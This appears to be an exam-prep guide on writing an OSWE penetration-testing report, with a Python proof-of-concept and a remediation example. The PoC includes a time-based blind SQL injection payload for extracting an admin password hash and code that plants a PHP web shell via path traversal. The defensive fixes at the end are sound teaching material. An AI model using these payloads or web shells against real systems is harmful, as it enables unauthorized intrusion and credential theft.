OSWE Exam Report Official

Unlike OSCP’s “proof of exploit” focus, OSWE requires:

A passing OSWE report must contain the following (based on OffSec's official template):

| Section | Required Content |
|--------|------------------|
| Objective | Brief summary of the test, targets, and overall outcome (e.g., "Achieved root/administrative access on both machines") |
| Methodology | High-level approach: source code review, attack surface mapping, vulnerability discovery, exploit development |
| Vulnerabilities & Exploits | One detailed section per unique vulnerability chain. Include: vulnerability type (e.g., SSTI, SQLi, deserialization); affected code snippet (with line numbers); proof of concept (PoC), i.e. a working exploit script; step-by-step reproduction |
| Flags / Proofs | Screenshots of proof.txt (or equivalent) and sensitive data (e.g., /etc/shadow, database contents) |
| Remediation | Brief fix for each vulnerability (optional for passing, but good practice) |
| Appendix | Full exploit code, curl commands, logs, or additional notes |


Unlike the OSCP (where each flag is independent), the OSWE often requires a chain of exploits to achieve RCE.

You must document the attack chain step-by-step:

Format this as a numbered list with code blocks. If the reviewer cannot replicate your chain in 10 minutes, you fail.

The following script uses the requests library to simulate browser behaviour and BeautifulSoup for parsing HTML responses during the SQLi extraction phase.

```python
import requests
import argparse
from bs4 import BeautifulSoup


class Exploit:
    def __init__(self, target_url, luser, lpass):
        self.target = target_url.rstrip('/')
        self.session = requests.Session()
        self.luser = luser
        self.lpass = lpass

    def authenticate(self):
        """Authenticates as a low-privileged user to establish a session."""
        print(f"[*] Authenticating as {self.luser}...")
        login_url = f"{self.target}/login.php"
        data = {'username': self.luser, 'password': self.lpass}
        r = self.session.post(login_url, data=data)
        if "Dashboard" in r.text:
            print("[+] Authentication successful.")
            return True
        print("[-] Authentication failed.")
        return False

    def extract_admin_hash(self):
        """
        Extracts admin hash via Blind SQLi.
        Assumption: Vulnerable param is 'search_term' in search functionality.
        """
        print("[*] Starting Blind SQL Injection extraction...")
        url = f"{self.target}/search.php"
        charset = "abcdef0123456789"  # Assuming MD5
        extracted_hash = ""
        # PoC for each position of the 32-character hash
        # Query logic: IF(SUBSTRING(password,i,1)='c', SLEEP(5), 0)
        for i in range(1, 33):
            for char in charset:
                # Payload construction (simplified for report context)
                payload = f"test' AND (SELECT SLEEP(5) FROM users WHERE username='admin' AND SUBSTRING(password,{i},1)='{char}')-- -"
                data = {'search_term': payload}
                try:
                    r = self.session.post(url, data=data, timeout=10)
                    # If the response takes > 5 seconds, we found the char
                    # (a real script would measure time.time() instead)
                except requests.exceptions.Timeout:
                    extracted_hash += char
                    print(f"[+] Found char {i}: {char} -> Current hash: {extracted_hash}")
                    break
        return extracted_hash

    def write_shell(self, admin_session):
        """Writes a PHP web shell to the server."""
        print("[*] Attempting to write web shell...")
        shell_url = f"{self.target}/admin/file_manager.php"
        shell_path = "shell.php"
        shell_content = "<?php system($_GET['cmd']); ?>"
        data = {
            'path': f"../../{shell_path}",  # Traversal to web root
            'content': shell_content
        }
        # Note: In a real exam, we would need to handle CSRF tokens here
        admin_session.post(shell_url, data=data)
        # Verify
        verify_url = f"{self.target}/{shell_path}?cmd=id"
        r = admin_session.get(verify_url)
        if "uid=" in r.text:
            print("[+] Shell written successfully!")
            print(f"[+] Output: {r.text}")
            return True
        return False


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="OSWE Exam Exploit Chain")
    parser.add_argument('-u', '--url', required=True, help='Target URL')
    parser.add_argument('-l', '--luser', required=True, help='Low Priv User')
    parser.add_argument('-p', '--lpass', required=True, help='Low Priv Pass')
    args = parser.parse_args()

    exploit = Exploit(args.url, args.luser, args.lpass)
    if exploit.authenticate():
        # Step 1: Get Admin Hash
        # admin_hash = exploit.extract_admin_hash()
        # For the report, we assume we successfully cracked this offline
        # or bypassed the login.
        # Step 2: Login as Admin (omitted for brevity)
        # ...
        # Step 3: Write Shell
        exploit.write_shell(exploit.session)
```
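The Remediation section of the template asks for a fix per vulnerability. As an added illustration (not from the page, the OffSec template, or the target application's PHP), here are the hardened counterparts of the two flaws the PoC script exercises, written in Python with an in-memory SQLite table and a constructed upload directory standing in for the app's search and file-manager endpoints:

```python
import sqlite3
from pathlib import Path

# Constructed sample rows standing in for the app's users table (not real data).
SAMPLE_USERS = [("admin", "5f4dcc3b5aa765d79d8b7a9ae2a6f8ef"),
                ("lowpriv", "0cc175b9c0f1b6a831c399e269772661")]
# Constructed upload root; the real app's document root is not given on the page.
UPLOAD_DIR = "/var/www/app/uploads"
# The PoC delivers a PHP shell, so server-executable extensions are refused outright.
BLOCKED_EXTENSIONS = {".php", ".phtml", ".phar"}


def make_db():
    """In-memory SQLite table mirroring the 'users' table the PoC queries."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def search_users(conn, search_term):
    """Remediated search.php logic: search_term is bound as a parameter, so the
    PoC's  test' AND (SELECT SLEEP(5) ...)-- -  string is matched as literal text
    and never reaches the SQL parser as code."""
    rows = conn.execute("SELECT username FROM users WHERE username LIKE ?",
                        (f"%{search_term}%",)).fetchall()
    return [row[0] for row in rows]


def validate_upload_path(user_path, base_dir=UPLOAD_DIR):
    """Remediated file_manager.php logic: resolve the requested path and refuse
    anything that escapes base_dir (the PoC's ../../shell.php traversal, or an
    absolute path) or carries an executable extension. Returns a Path or None."""
    base = Path(base_dir).resolve()
    target = (base / user_path).resolve()
    if target != base and base not in target.parents:
        return None  # traversal outside the upload root
    if target.suffix.lower() in BLOCKED_EXTENSIONS:
        return None  # would be executed by the web server if written here
    return target


if __name__ == "__main__":
    db = make_db()
    sqli = "test' AND (SELECT SLEEP(5) FROM users WHERE username='admin')-- -"
    print("search 'admin':", search_users(db, "admin"))
    print("search with PoC payload:", search_users(db, sqli))
    print("notes.txt ->", validate_upload_path("notes.txt"))
    print("../../shell.php ->", validate_upload_path("../../shell.php"))
```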
